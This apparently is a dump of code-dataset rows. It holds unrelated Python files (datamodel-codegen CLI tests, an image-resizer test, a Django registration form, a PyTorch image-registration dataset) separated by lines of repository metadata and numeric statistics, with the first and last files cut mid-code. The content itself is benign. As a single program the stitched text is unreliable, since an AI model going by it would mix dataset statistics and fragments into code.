input_file: Path = Path(input_dir) / 'input.yaml'
output_file: Path = Path(output_dir) / 'output.py'
input_file.write_text(':')
return_code: Exit = main(
[
'--input',
str(input_file),
'--output',
str(output_file),
'--input-file-type',
'auto',
]
)
assert return_code == Exit.ERROR
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_jsonschema():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_SCHEMA_DATA_PATH / 'person.json'),
'--output',
str(output_file),
'--input-file-type',
'jsonschema',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Any, List, Optional
from pydantic import BaseModel, Field, conint
class Person(BaseModel):
firstName: Optional[str] = Field(None, description="The person\'s first name.")
lastName: Optional[str] = Field(None, description="The person\'s last name.")
age: Optional[conint(ge=0.0)] = Field(
None, description='Age in years which must be equal to or greater than zero.'
)
friends: Optional[List] = None
comment: Optional[Any] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_jsonschema_nested_deep():
import os
os.chdir(DATA_PATH / 'jsonschema')
with TemporaryDirectory() as output_dir:
output_init_file: Path = Path(output_dir) / '__init__.py'
output_nested_file: Path = Path(output_dir) / 'nested/deep.py'
output_empty_parent_nested_file: Path = Path(
output_dir
) / 'empty_parent/nested/deep.py'
return_code: Exit = main(
[
'--input',
str(JSON_SCHEMA_DATA_PATH / 'nested_person.json'),
'--output',
str(output_dir),
'--input-file-type',
'jsonschema',
]
)
assert return_code == Exit.OK
print(list(Path(output_dir).iterdir()))
assert (
output_init_file.read_text()
== '''# generated by datamodel-codegen:
# filename: nested_person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from .empty_parent.nested import deep as deep_1
from .nested import deep
class NestedPerson(BaseModel):
nested_deep_childJson: Optional[deep.Json] = None
nested_deep_childAnother: Optional[deep.Another] = None
empty_parent_nested_deep_childJson: Optional[deep_1.Json] = None
'''
)
assert (
output_nested_file.read_text()
== '''# generated by datamodel-codegen:
# filename: nested_person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
class Json(BaseModel):
firstName: Optional[str] = None
class Another(BaseModel):
firstName: Optional[str] = None
'''
)
assert (
output_empty_parent_nested_file.read_text()
== '''# generated by datamodel-codegen:
# filename: nested_person.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
class Json(BaseModel):
firstName: Optional[str] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_json():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_DATA_PATH / 'pet.json'),
'--output',
str(output_file),
'--input-file-type',
'json',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: pet.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel
class Pet(BaseModel):
name: str
age: int
class Model(BaseModel):
Pet: Pet
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_json_failed():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(JSON_DATA_PATH / 'broken.json'),
'--output',
str(output_file),
'--input-file-type',
'json',
]
)
assert return_code == Exit.ERROR
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_main_yaml():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(YAML_DATA_PATH / 'pet.yaml'),
'--output',
str(output_file),
'--input-file-type',
'yaml',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: pet.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel
class Pet(BaseModel):
name: str
age: int
class Model(BaseModel):
Pet: Pet
'''
)
with pytest.raises(SystemExit):
main()
@pytest.mark.parametrize(
'expected',
[
{
(
'__init__.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from . import models
class Id(BaseModel):
__root__: str
class Error(BaseModel):
code: int
message: str
class Result(BaseModel):
event: Optional[models.Event] = None
class Source(BaseModel):
country: Optional[str] = None
''',
(
'models.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from enum import Enum
from typing import Any, Dict, List, Optional, Union
from pydantic import BaseModel
class Species(Enum):
dog = 'dog'
cat = 'cat'
snake = 'snake'
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
species: Optional[Species] = None
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Event(BaseModel):
name: Optional[Union[str, float, int, bool, Dict[str, Any], List[str]]] = None
''',
(
'collections.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
from . import models
class Pets(BaseModel):
__root__: List[models.Pet]
class Users(BaseModel):
__root__: List[models.User]
class Rules(BaseModel):
__root__: List[str]
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
''',
(
'foo',
'__init__.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from .. import Id
class Tea(BaseModel):
flavour: Optional[str] = None
id: Optional[Id] = None
class Cocoa(BaseModel):
quality: Optional[int] = None
''',
(
'foo',
'bar.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Any, Dict, List, Optional
from pydantic import BaseModel
class Thing(BaseModel):
attributes: Optional[Dict[str, Any]] = None
class Thang(BaseModel):
attributes: Optional[List[Dict[str, Any]]] = None
class Clone(Thing):
pass
''',
(
'woo',
'__init__.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
''',
(
'woo',
'boo.py',
): '''\
# generated by datamodel-codegen:
# filename: modular.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel
from .. import Source, foo
class Chocolate(BaseModel):
flavour: Optional[str] = None
source: Optional[Source] = None
cocoa: Optional[foo.Cocoa] = None
''',
}
],
)
def test_main_modular(
tmpdir_factory: TempdirFactory, expected: Mapping[str, str]
) -> None:
"""Test main function on modular file."""
output_directory = Path(tmpdir_factory.mktemp('output'))
input_filename = OPEN_API_DATA_PATH / 'modular.yaml'
output_path = output_directory / 'model'
with freeze_time(TIMESTAMP):
main(['--input', str(input_filename), '--output', str(output_path)])
for key, value in expected.items():
result = output_path.joinpath(*key).read_text()
assert result == value
def test_main_modular_no_file() -> None:
"""Test main function on modular file with no output name."""
input_filename = OPEN_API_DATA_PATH / 'modular.yaml'
assert main(['--input', str(input_filename)]) == Exit.ERROR
def test_main_modular_filename(tmpdir_factory: TempdirFactory) -> None:
"""Test main function on modular file with filename."""
output_directory = Path(tmpdir_factory.mktemp('output'))
input_filename = OPEN_API_DATA_PATH / 'modular.yaml'
output_filename = output_directory / 'model.py'
assert (
main(['--input', str(input_filename), '--output', str(output_filename)])
== Exit.ERROR
)
@pytest.mark.parametrize(
'expected',
[
'''\
# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
],
)
def test_main_no_file(capsys: CaptureFixture, expected: str) -> None:
"""Test main function on non-modular file with no output name."""
input_filename = OPEN_API_DATA_PATH / 'api.yaml'
with freeze_time(TIMESTAMP):
main(['--input', str(input_filename)])
captured = capsys.readouterr()
assert captured.out == expected
assert not captured.err
@pytest.mark.parametrize(
'expected',
[
'''\
# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel): # 1 2, 1 2, this is just a pet
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = None
apiVersionNumber: Optional[str] = None
apiUrl: Optional[AnyUrl] = None
apiDocumentationUrl: Optional[AnyUrl] = None
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
],
)
def test_main_custom_template_dir(capsys: CaptureFixture, expected: str) -> None:
"""Test main function with custom template directory."""
input_filename = OPEN_API_DATA_PATH / 'api.yaml'
custom_template_dir = DATA_PATH / 'templates'
extra_template_data = OPEN_API_DATA_PATH / 'extra_data.json'
with freeze_time(TIMESTAMP):
main(
[
'--input',
str(input_filename),
'--custom-template-dir',
str(custom_template_dir),
'--extra-template-data',
str(extra_template_data),
]
)
captured = capsys.readouterr()
assert captured.out == expected
assert not captured.err
@freeze_time('2019-07-26')
def test_pyproject():
with TemporaryDirectory() as output_dir:
output_dir = Path(output_dir)
pyproject_toml = Path(DATA_PATH) / "project" / "pyproject.toml"
shutil.copy(pyproject_toml, output_dir)
output_file: Path = output_dir / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import (
annotations,
)
from typing import (
List,
Optional,
)
from pydantic import (
AnyUrl,
BaseModel,
Field,
)
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[
str
] = Field(
None,
description="To be used as a dataset parameter value",
)
apiVersionNumber: Optional[
str
] = Field(
None,
description="To be used as a version parameter value",
)
apiUrl: Optional[
AnyUrl
] = Field(
None,
description="The URL describing the dataset\'s fields",
)
apiDocumentationUrl: Optional[
AnyUrl
] = Field(
None,
description="A URL to the API console for each API",
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[
Event
] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_validation():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
return_code: Exit = main(
[
'--input',
str(OPEN_API_DATA_PATH / 'api.yaml'),
'--output',
str(output_file),
'--validation',
]
)
assert return_code == Exit.OK
assert (
output_file.read_text()
== '''# generated by datamodel-codegen:
# filename: api.yaml
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from pydantic import AnyUrl, BaseModel, Field
class Pet(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Pets(BaseModel):
__root__: List[Pet]
class User(BaseModel):
id: int
name: str
tag: Optional[str] = None
class Users(BaseModel):
__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_validation_failed():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
assert (
main(
[
'--input',
str(OPEN_API_DATA_PATH / 'invalid.yaml'),
'--output',
str(output_file),
'--input-file-type',
'openapi',
'--validation',
]
)
== Exit.ERROR
)
| 21.647153 | 85 | 0.605134 | 3,090 | 26,994 | 5.101295 | 0.070874 | 0.013703 | 0.043139 | 0.029182 | 0.855992 | 0.815898 | 0.798896 | 0.785447 | 0.759754 | 0.744338 | 0 | 0.026468 | 0.283396 | 26,994 | 1,246 | 86 | 21.664526 | 0.78841 | 0.009335 | 0 | 0.678133 | 0 | 0.001229 | 0.568356 | 0.035028 | 0 | 0 | 0 | 0 | 0.039312 | 1 | 0.022113 | false | 0.001229 | 0.085995 | 0 | 0.108108 | 0.001229 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07679a9453ffba3ea1c9da67dee4bd1de0f5fea7 | 1,791 | py | Python | crafters/image/ImageResizer/tests/test_imageresizer.py | julianpetrich/jina-hub | a7703282462ae3bac226249365426b3998949f8f | [
"Apache-2.0"
] | null | null | null | crafters/image/ImageResizer/tests/test_imageresizer.py | julianpetrich/jina-hub | a7703282462ae3bac226249365426b3998949f8f | [
"Apache-2.0"
] | null | null | null | crafters/image/ImageResizer/tests/test_imageresizer.py | julianpetrich/jina-hub | a7703282462ae3bac226249365426b3998949f8f | [
"Apache-2.0"
] | null | null | null | import pytest
from .. import ImageResizer
def create_random_img_array(img_height, img_width):
import numpy as np
return np.random.randint(0, 256, (img_height, img_width, 3))
def create_random_gray_img_array(img_height, img_width):
import numpy as np
return np.random.randint(0, 256, (img_height, img_width, 1))
def create_random_gray_img_array_2d(img_height, img_width):
import numpy as np
return np.random.randint(0, 256, (img_height, img_width))
def test_resize():
img_width = 20
img_height = 17
# Test for int target_size
output_dim = 71
crafter = ImageResizer(target_size=output_dim)
img_array = create_random_img_array(img_height, img_width)
crafted_doc = crafter.craft(img_array)
assert min(crafted_doc['blob'].shape[:-1]) == output_dim
# Test for tuple/list target_size
output_dim = (img_height, img_width)
crafter = ImageResizer(target_size=output_dim)
img_array = create_random_img_array(img_width, img_height)
crafted_doc = crafter.craft(img_array)
assert crafted_doc['blob'].shape[:-1] == output_dim
@pytest.mark.parametrize('img_array', [create_random_gray_img_array(17, 20),
create_random_gray_img_array_2d(17, 20)]
)
def test_resize_gray(img_array):
img_width = 20
img_height = 17
# Test for int target_size
output_dim = 71
crafter = ImageResizer(target_size=output_dim)
crafted_doc = crafter.craft(img_array)
assert min(crafted_doc['blob'].shape[:-1]) == output_dim
# Test for tuple/list target_size
output_dim = (img_height, img_width)
crafter = ImageResizer(target_size=output_dim)
crafted_doc = crafter.craft(img_array)
assert crafted_doc['blob'].shape == output_dim
| 31.421053 | 79 | 0.707426 | 261 | 1,791 | 4.509579 | 0.172414 | 0.101954 | 0.091759 | 0.129992 | 0.883602 | 0.863212 | 0.80034 | 0.791844 | 0.769754 | 0.769754 | 0 | 0.02714 | 0.197655 | 1,791 | 56 | 80 | 31.982143 | 0.791928 | 0.063093 | 0 | 0.552632 | 0 | 0 | 0.014943 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.131579 | false | 0 | 0.131579 | 0 | 0.342105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4ad8d6af7aa38acd4aff9c545aabcf63f8fc00be | 43 | py | Python | epymetheus/wealth/__init__.py | shishaboy/epymetheus | d8916b20c6b79e86e5aadb39c7c01a582659f03b | [
"BSD-3-Clause"
] | null | null | null | epymetheus/wealth/__init__.py | shishaboy/epymetheus | d8916b20c6b79e86e5aadb39c7c01a582659f03b | [
"BSD-3-Clause"
] | null | null | null | epymetheus/wealth/__init__.py | shishaboy/epymetheus | d8916b20c6b79e86e5aadb39c7c01a582659f03b | [
"BSD-3-Clause"
] | null | null | null | # flake8: noqa
from .wealth import Wealth
| 10.75 | 26 | 0.744186 | 6 | 43 | 5.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.186047 | 43 | 3 | 27 | 14.333333 | 0.885714 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4ae4613e91a88090eb9cd03e1eead6b4e657be24 | 177 | py | Python | import_descendants/views.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/views.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/views.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | 1 | 2020-03-23T13:59:40.000Z | 2020-03-23T13:59:40.000Z | # -*- coding: utf-8 -*-
# (c) 2013 Bright Interactive Limited. All rights reserved.
# http://www.bright-interactive.com | info@bright-interactive.com
# Create your views here.
| 29.5 | 65 | 0.711864 | 24 | 177 | 5.25 | 0.791667 | 0.404762 | 0.31746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03268 | 0.135593 | 177 | 5 | 66 | 35.4 | 0.79085 | 0.943503 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4af3437c3655a64888cc4528534df3607b1241a6 | 30 | py | Python | orkan/__init__.py | tobigue/Orkan | ff97cdb3568df3d50c3c76453ced7559d80fab2c | [
"Apache-2.0"
] | 3 | 2019-11-28T11:42:45.000Z | 2021-01-28T03:39:12.000Z | orkan/__init__.py | tobigue/Orkan | ff97cdb3568df3d50c3c76453ced7559d80fab2c | [
"Apache-2.0"
] | null | null | null | orkan/__init__.py | tobigue/Orkan | ff97cdb3568df3d50c3c76453ced7559d80fab2c | [
"Apache-2.0"
] | 4 | 2017-05-21T17:34:13.000Z | 2019-11-28T11:31:40.000Z | from pipeline import Pipeline
| 15 | 29 | 0.866667 | 4 | 30 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab2e19623a202a7821f9e31a4f14a7fbcd1b0b60 | 564 | py | Python | black_jack_project/black_jack/forms.py | cbbowman/black_jack | 6f1df1da79f17e691c022b4bc082f2377b27ccd9 | [
"CC0-1.0"
] | null | null | null | black_jack_project/black_jack/forms.py | cbbowman/black_jack | 6f1df1da79f17e691c022b4bc082f2377b27ccd9 | [
"CC0-1.0"
] | null | null | null | black_jack_project/black_jack/forms.py | cbbowman/black_jack | 6f1df1da79f17e691c022b4bc082f2377b27ccd9 | [
"CC0-1.0"
] | null | null | null | from django import forms
class RegisterForm(forms.Form):
username = forms.CharField(max_length=20)
first_name = forms.CharField(max_length=20)
last_name = forms.CharField(max_length=20)
email = forms.CharField(max_length=30,widget= forms.EmailInput)
password = forms.CharField(max_length=20,widget= forms.PasswordInput)
confirm = forms.CharField(max_length=20,widget= forms.PasswordInput)
class LoginForm(forms.Form):
username = forms.CharField(max_length=20)
password = forms.CharField(max_length=20,widget= forms.PasswordInput) | 40.285714 | 73 | 0.769504 | 74 | 564 | 5.72973 | 0.310811 | 0.264151 | 0.320755 | 0.433962 | 0.71934 | 0.71934 | 0.582547 | 0.582547 | 0.268868 | 0 | 0 | 0.032389 | 0.124113 | 564 | 14 | 74 | 40.285714 | 0.825911 | 0 | 0 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.272727 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
ab3ffd703dc15a6d07f9e001d62263d38bdf5269 | 96 | py | Python | tests/integration/mongodb/impl/__init__.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 5 | 2020-08-26T20:12:00.000Z | 2020-12-11T16:39:22.000Z | tests/integration/mongodb/impl/__init__.py | RaenonX/Jelly-Bot | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 234 | 2019-12-14T03:45:19.000Z | 2020-08-26T18:55:19.000Z | tests/integration/mongodb/impl/__init__.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 2 | 2019-10-23T15:21:15.000Z | 2020-05-22T09:35:55.000Z | from .base_col import * # noqa
from .base_result import * # noqa
from .mixin import * # noqa
| 24 | 34 | 0.6875 | 14 | 96 | 4.571429 | 0.5 | 0.46875 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 96 | 3 | 35 | 32 | 0.853333 | 0.145833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ab5d6b636527662d8e85f02e9815e689ad9c70ea | 8,861 | py | Python | pymira/img/datasets.py | haehn/istn | 4ad0e9a4224cc028ac0465afd4ff9712f0834f9f | [
"Apache-2.0"
] | null | null | null | pymira/img/datasets.py | haehn/istn | 4ad0e9a4224cc028ac0465afd4ff9712f0834f9f | [
"Apache-2.0"
] | null | null | null | pymira/img/datasets.py | haehn/istn | 4ad0e9a4224cc028ac0465afd4ff9712f0834f9f | [
"Apache-2.0"
] | null | null | null | import torch
import numpy as np
import pandas as pd
import SimpleITK as sitk
from torch.utils.data import Dataset, DataLoader
class ImageRegistrationDataset(Dataset):
"""Dataset for pairwise image registration."""
def __init__(self, csv_file_img, csv_file_msk=None, normalizer=None, resampler=None):
"""
Args:
:param csv_file_img (string): Path to csv file with image filenames.
:param csv_file_msk (string): Path to csv file with mask filenames.
:param normalizer (callable, optional): Optional transform to be applied on each image.
:param resampler (callable, optional): Optional transform to be applied on each image.
"""
self.data = pd.read_csv(csv_file_img)
if csv_file_msk:
self.msk_data = pd.read_csv(csv_file_msk)
self.samples = []
for idx in range(len(self.data)):
src_path = self.data.iloc[idx, 0]
trg_path = self.data.iloc[idx, 1]
print('Reading source image ' + src_path)
source = sitk.ReadImage(src_path, sitk.sitkFloat32)
print('Reading target image ' + trg_path)
target = sitk.ReadImage(trg_path, sitk.sitkFloat32)
source_msk = sitk.GetImageFromArray(np.ones(source.GetSize()[::-1]))
target_msk = sitk.GetImageFromArray(np.ones(target.GetSize()[::-1]))
if csv_file_msk:
src_msk_path = self.msk_data.iloc[idx, 0]
trg_msk_path = self.msk_data.iloc[idx, 1]
print('Reading source mask ' + src_msk_path)
source_msk = sitk.ReadImage(src_msk_path, sitk.sitkFloat32)
source_msk.CopyInformation(source)
print('Reading target mask ' + trg_msk_path)
target_msk = sitk.ReadImage(trg_msk_path, sitk.sitkFloat32)
target_msk.CopyInformation(target)
if normalizer:
source = normalizer(source, source_msk)
target = normalizer(target, target_msk)
if resampler:
source = resampler(source)
target = resampler(target)
source_msk = resampler(source_msk)
target_msk = resampler(target_msk)
if len(source.GetSize()) == 3:
source.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
target.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
else:
source.SetDirection((1, 0, 0, 1))
target.SetDirection((1, 0, 0, 1))
source.SetOrigin(np.zeros(len(source.GetOrigin())))
target.SetOrigin(np.zeros(len(target.GetOrigin())))
source_msk.CopyInformation(source)
target_msk.CopyInformation(target)
sample = {'source': source, 'target': target, 'source_msk': source_msk, 'target_msk': target_msk}
self.samples.append(sample)
def __len__(self):
return len(self.data)
def __getitem__(self, item):
sample = self.samples[item]
source = torch.from_numpy(sitk.GetArrayFromImage(sample['source'])).unsqueeze(0)
target = torch.from_numpy(sitk.GetArrayFromImage(sample['target'])).unsqueeze(0)
source_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['source_msk'])).unsqueeze(0)
target_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['target_msk'])).unsqueeze(0)
return {'source': source, 'target': target, 'source_msk': source_msk, 'target_msk': target_msk}
def get_sample(self, item):
return self.samples[item]
class ImageSegRegDataset(Dataset):
"""Dataset for pairwise image registration with segmentation loss."""
def __init__(self, csv_file_img, csv_file_seg, csv_file_msk=None, normalizer_img=None, resampler_img=None, normalizer_seg=None, resampler_seg=None):
"""
Args:
:param csv_file_img (string): Path to csv file with image filenames.
:param csv_file_seg (string): Path to csv file with segmentation filenames.
:param csv_file_msk (string): Path to csv file with mask filenames.
:param normalizer_img (callable, optional): Optional transform to be applied on each image.
:param resampler_img (callable, optional): Optional transform to be applied on each image.
:param normalizer_seg (callable, optional): Optional transform to be applied on each segmentation.
:param resampler_seg (callable, optional): Optional transform to be applied on each segmentation.
"""
self.img_data = pd.read_csv(csv_file_img)
if csv_file_seg:
self.seg_data = pd.read_csv(csv_file_seg)
if csv_file_msk:
self.msk_data = pd.read_csv(csv_file_msk)
self.samples = []
for idx in range(len(self.img_data)):
src_path = self.img_data.iloc[idx, 0]
trg_path = self.img_data.iloc[idx, 1]
print('Reading source image ' + src_path)
source = sitk.ReadImage(src_path, sitk.sitkFloat32)
print('Reading target image ' + trg_path)
target = sitk.ReadImage(trg_path, sitk.sitkFloat32)
source_seg = sitk.GetImageFromArray(np.ones(source.GetSize()[::-1]))
target_seg = sitk.GetImageFromArray(np.ones(target.GetSize()[::-1]))
if csv_file_seg:
src_seg_path = self.seg_data.iloc[idx, 0]
trg_seg_path = self.seg_data.iloc[idx, 1]
print('Reading source segmentation ' + src_seg_path)
source_seg = sitk.ReadImage(src_seg_path, sitk.sitkFloat32)
print('Reading target segmentation ' + trg_seg_path)
